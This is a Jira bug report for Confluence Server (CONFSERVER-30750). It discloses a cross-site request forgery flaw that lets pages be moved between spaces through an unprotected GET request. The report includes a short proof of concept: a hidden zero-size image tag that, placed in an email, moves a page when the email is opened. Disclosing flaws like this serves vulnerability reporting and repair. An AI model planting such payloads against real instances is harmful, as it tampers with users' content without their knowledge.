Uploaded image for project: 'Confluence Data Center'
  1. Confluence Data Center
  2. CONFSERVER-30750

Moving pages around spaces using HTTP get without XSRF token

    XMLWordPrintable

Details

    Description

      Seems like you can easily move pages around spaces by just hitting the movepage action using GET, like this:

      http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2

      Malicious example of how to exploit this (in an email message):

      <img src="http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2" style="height:0;width:0">

      (after opening the email, the page has been moved to S2 space)

      scary!!

      Attachments

        Issue Links

          mentioned in

          Page Loading...

          Activity

            People

              psaw PatrickA
              iloire Ivan Loire (Inactive)
              Votes:
              0 Vote for this issue
              Watchers:
              6 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: